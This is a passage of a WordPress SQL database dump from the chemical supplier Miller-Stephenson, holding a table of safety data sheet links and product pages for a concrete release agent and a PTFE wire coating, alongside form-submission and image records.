href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3140.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-05-25 12:52:52', '2017-05-25 12:52:52', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4275, 0, '2017-05-25 13:23:23', '2017-05-25 13:23:23', '', '', '', 'publish', 'closed', 'closed', '', '4275', '', '', '2017-05-25 13:23:24', '2017-05-25 13:23:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/4275/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4276, 0, '2017-05-25 14:06:19', '2017-05-25 14:06:19', '', '', '', 'publish', 'closed', 'closed', '', '4276', '', '', '2017-05-25 14:06:20', '2017-05-25 14:06:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/4276/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4277, 0, '2017-05-25 16:20:26', '2017-05-25 16:20:26', '', '', '', 'publish', 'closed', 'closed', '', '4277', '', '', '2017-05-25 16:20:26', '2017-05-25 16:20:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4277/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4278, 0, '2017-05-25 16:33:08', '2017-05-25 16:33:08', '', '', '', 'publish', 'closed', 'closed', '', '4278', '', '', '2017-05-25 16:33:08', '2017-05-25 16:33:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/4278/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4279, 0, '2017-05-25 19:20:22', '2017-05-25 19:20:22', '', '', '', 'publish', 'closed', 'closed', '', '4279', '', '', '2017-05-25 19:20:23', '2017-05-25 19:20:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/4279/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4280, 0, '2017-05-26 06:54:28', '2017-05-26 06:54:28', '', '', '', 'publish', 'closed', 'closed', '', '4280', '', '', '2017-05-26 06:54:29', '2017-05-26 06:54:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4280/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4281, 3, '2017-05-26 12:53:21', '2017-05-26 12:53:21', '', 'PTFE aerosol spray', '', 'inherit', 'closed', 'closed', '', 'shutterstock_92795974', '', '', '2017-05-26 12:53:42', '2017-05-26 12:53:42', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_92795974.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4282, 3, '2017-05-26 13:23:34', '2017-05-26 13:23:34', '', 'PTFE release', '', 'inherit', 'closed', 'closed', '', 'shutterstock_566838472', '', '', '2017-05-30 14:33:36', '2017-05-30 14:33:36', '', 4321, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4283, 0, '2017-05-26 13:59:46', '2017-05-26 13:59:46', '', '', '', 'publish', 'closed', 'closed', '', '4283', '', '', '2017-05-26 13:59:46', '2017-05-26 13:59:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4283/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4284, 0, '2017-05-26 14:10:38', '2017-05-26 14:10:38', '', '', '', 'publish', 'closed', 'closed', '', '4284', '', '', '2017-05-26 14:10:38', '2017-05-26 14:10:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/4284/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4287, 3, '2017-05-26 15:39:15', '2017-05-26 15:39:15', '', 'specialty mold release', '', 'inherit', 'closed', 'closed', '', 'shutterstock_530979514', '', '', '2017-05-30 14:26:23', '2017-05-30 14:26:23', '', 4321, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4288, 3, '2017-05-26 15:50:34', '2017-05-26 15:50:34', '<h2>ReleaSys™ CR - Concrete Release Agent</h2>\r\n<h3>Superior Chemistry for all Concrete Release Agent Applications</h3>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns.  Most importantly, ReleaSys CR achieves all of this in a highly efficient and cost-effective system. At Miller-Stephenson, we understand that mold life and part de-molding are points of critical performance for concrete and stone veneer manufacturing. These aspects of the process are where Miller-Stephenson\'s concrete release agent products can improve your productivity and part quality. The ReleaSys line of mold release agents provides a competitive advantage to the largest and smallest manufacturers alike with water-based release agent solutions that can maximize productivity, while meeting the most demanding specifications and operating conditions. ReleaSys CR concrete release agents for concrete and masonry veneer manufacturers provide:\r\n<ul>\r\n 	<li>Extended service life of flexible molds</li>\r\n 	<li>Minimization/Elimination of "bug-holes"</li>\r\n 	<li>Optimal pigment transfer and color appearance</li>\r\n 	<li>Improved release ease</li>\r\n 	<li>Cleaner, safer environments</li>\r\n 	<li>Higher quality parts</li>\r\n 	<li>Less downtime; Lower scrap rates</li>\r\n 	<li>Cleaner molds</li>\r\n</ul>\r\n<h3>ReleaSys CR - Minimizes scrap rates and maintains color pigmentations</h3>\r\nConcrete is one of the most widely utilized materials for building and construction projects globally. In the majority of cases, there is a very limited need for release agents in conjunction with the use of concrete, and even less of a need for highly specialized release agents such as those developed by Miller-Stephenson. However, in applications where concrete is utilized to mimic the appearance of natural stones (veneer/masonry stone) or in instances where the concrete is meant to be exposed for aesthetic appearances, such as in architectural concrete applications, then high-performance concrete release agents should be utilized. ReleaSys CR is ideally suited to provide the necessary barrier to protect mold surfaces while allowing consistent, uniform release of your intricate concrete designs.\r\n\r\nReleaSys CR provides the best technology and most economical way to produce visually pleasing concrete for interior and exterior applications. They are available in various chemistries that are specially formulated for the release of glass-fiber reinforced concrete (GFRC), precast, and composite reinforced concrete from molds made of polyurethane, silicone, rubber, epoxy, and fiberglass. <span style="text-decoration: underline;">Our concrete release agent does not stain or transfer to the surface, finished parts are color-ready and paint-ready.</span>\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a>', 'ReleaSys™ CR | Concrete Release Agent', 'Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns.  Most importantly, ReleaSys CR achieves all of this in a highly efficient and cost-effective system. Benefits Include"\r\n<ul>\r\n 	<li>Extended service life of flexible molds</li>\r\n 	<li>Minimization/Elimination of "bug-holes"</li>\r\n 	<li>Optimal pigment transfer and color appearance</li>\r\n 	<li>Improved release ease</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'concrete-release-agent', '', '', '2017-06-05 19:10:14', '2017-06-05 19:10:14', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4288', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4289, 3, '2017-05-26 15:47:23', '2017-05-26 15:47:23', '', 'Concrete Release Agent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_116206609', '', '', '2017-05-26 16:38:45', '2017-05-26 16:38:45', '', 4288, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4290, 3, '2017-05-30 18:12:25', '2017-05-30 18:12:25', '<h2>ReleaSys™ CR - Concrete Release Agent</h2>\n<h3>Superior Chemistry for all Concrete Release Agent Applications</h3>\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns.  Most importantly, ReleaSys CR achieves all of this in a highly efficient and cost-effective system. At Miller-Stephenson, we understand that mold life and part de-molding are points of critical performance for concrete and stone veneer manufacturing. These aspects of the process are where Miller-Stephenson\'s concrete release agent products can improve your productivity and part quality. The ReleaSys line of mold release agents provide a competitive advantage to the largest and smallest manufacturers alike with water-based release agent solutions that can maximize productivity, while meeting the most demanding specifications and operating conditions. ReleaSys CR concrete release agents for concrete and masonry veneer manufacturers provide:\n<ul>\n 	<li>Extended service life of flexible molds</li>\n 	<li>Minimization/Elimination of "bug-holes"</li>\n 	<li>Optimal pigment transfer and color appearance</li>\n 	<li>Improved release ease</li>\n 	<li>Cleaner, safer environments</li>\n 	<li>Higher quality parts</li>\n 	<li>Less downtime; Lower scrap rates</li>\n 	<li>Cleaner molds</li>\n</ul>\n<h3>ReleaSys CR - Minimizes scrap rates and</h3>\nConcrete is one of the most widely utilized materials for building and construction projects globally. In the majority of cases there is a very limited need for release agents in conjunction with the use of concrete, and even less of a need for highly specialized release agents such as those developed by Miller-Stephenson. However, in applications where concrete is utilized to mimic the appearance of natural stones (veneer/masonry stone) or in instances where the concrete is meant to be exposed for aesthetic appearance, such as in architectural concrete applications, then high performance concrete release agents should be utilized. ReleaSys CR is ideally suit to provide the necessary barrier to protect mold surfaces while allowing consistent, uniform release of your intricate concrete designs.\n\nReleaSys CR provides the best technology and most economical way to produce visually pleasing concrete for interior and exterior applications. They are available in various chemistries that are specially formulated for release of glass-fiber reinforced concrete (GFRC), precast, and composite reinforced concrete from molds made of polyurethane, silicone, rubber, epoxy, and fiberglass. <span style="text-decoration: underline;">Our concrete release agent does not stain or transfer to the surface, finished parts are color-ready and paint-ready.</span>\n\n&nbsp;\n\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a>', 'ReleaSys™ CR | Concrete Release Agent', 'Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns.  Most importantly, ReleaSys CR achieves all of this in a highly efficient and cost-effective system. Benefits Include"\n<ul>\n 	<li>Extended service life of flexible molds</li>\n 	<li>Minimization/Elimination of "bug-holes"</li>\n 	<li>Optimal pigment transfer and color appearance</li>\n 	<li>Improved release ease</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4288-autosave-v1', '', '', '2017-05-30 18:12:25', '2017-05-30 18:12:25', '', 4288, 'https://www.miller-stephenson.com/4288-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4291, 0, '2017-05-26 16:26:45', '2017-05-26 16:26:45', '', '', '', 'publish', 'closed', 'closed', '', '4291', '', '', '2017-05-26 16:26:46', '2017-05-26 16:26:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4291/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4292, 2, '2017-05-26 17:13:44', '2017-05-26 17:13:44', '<h3><strong>ShieldSys 402 PTFE Wire Coatings Introduction</strong></h3>\nShieldSys 402 <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a> wire coatings are designed to provide unmatched lubricity and anti-stick properties to all wires, cables, and composites materials. This coating adds high lubricity and antistick properties to metal, glass, rubber, and plastic surfaces. ShieldSys 402 wire coating is a isopropyl alcohol based dispersion offering accelerated dry and cure times relatives to ShieldSys 815 and 520.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 402 is a proprietary PTFE wire coating formulation providing unmatched surface adhesion, durability and wear resistance to applied surfaces.\n<h4><strong>Advantages of Insulator &amp; Conductor Coating:</strong></h4>\nShieldSys 402 exhibit outstanding lubricity and extremely low coefficient of friction. Coating wire conductors provides a nonstick surface so insulation strips away easily. Coating insulated wire provides nonstick so multiple twisted wires do not stick together. The patented polymer is thermally stable and can be used at temperatures up to 250°C . The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\n<h4><strong>Wire Drawing Lubricant:</strong></h4>\nShieldSys 402 PTFE wire coating is a high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.\n<h4><strong>Coating and Wire Stripping:</strong></h4>\nDue to ShieldSys\' unique properties they are the ideal coatings for enhancing lubricity and antistick properties on conductor or insulated wire and cable. Our PTFE Wire Coating dispersions are used to impart a thin nonstick film on metal wires as well as on insulated wire and cable products and twisted wire in jackets. Benefits include: reduce insulation stripping force, provide nonstick (abrasion resistance) to twisted wire, and a lubricant for welding wire, wire forming, and knitting.\n<h4><strong>Processing Details:</strong></h4>\nThe application of ShieldSys DryFilm products fits easily into most wire or coating production facilities. The wire can be run through a dispersion bath containing one our PTFE wire coatings. Alternately, conventional spraying equipment can be used to coat your material. A heating or drying step is recommended to ensure the carrier has evaporated prior to insulation, spooling or final operation. Quick drying can be achieved by using the solvent-based products that use isopropyl alcohol like ShieldSys 402 PTFE Wire Coatings.', 'ShieldSys™ 402 PTFE Wire Coatings', 'ShieldSys 402 PTFE Wire Coating is a solvent-based system designed to provide robust anti-stick and wear resistance for a variety of applications and substrates. This coating adds high lubricity and low coefficient of friction properties to metal, glass, rubber, and plastic surfaces. Utilization of a specialized binding system allows for enhance durability and wear resistance. ShieldSys 402 solvent-based formulation offers accelerated drying and cure times relative to ShieldSys 815 and 520. Properly applied, it will develop a high adhesion, durable coating that excels on all insulating or conducting applications and as a dry barrier lubricant. Benefits include:\n<ul>\n 	<li>High lubricity; Anti-stick properties</li>\n 	<li>Enhance wear resistance</li>\n 	<li>Excellent adhesion to most substrates</li>\n 	<li>Non-migrating; Non-oil lubricant</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4090-autosave-v1', '', '', '2017-05-26 17:13:44', '2017-05-26 17:13:44', '', 4090, 'https://www.miller-stephenson.com/4090-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4293, 0, '2017-05-26 18:48:14', '2017-05-26 18:48:14', '', '', '', 'publish', 'closed', 'closed', '', '4293', '', '', '2017-05-26 18:48:14', '2017-05-26 18:48:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4293/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4295, 1, '2017-05-27 09:04:52', '2017-05-27 09:04:52', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" 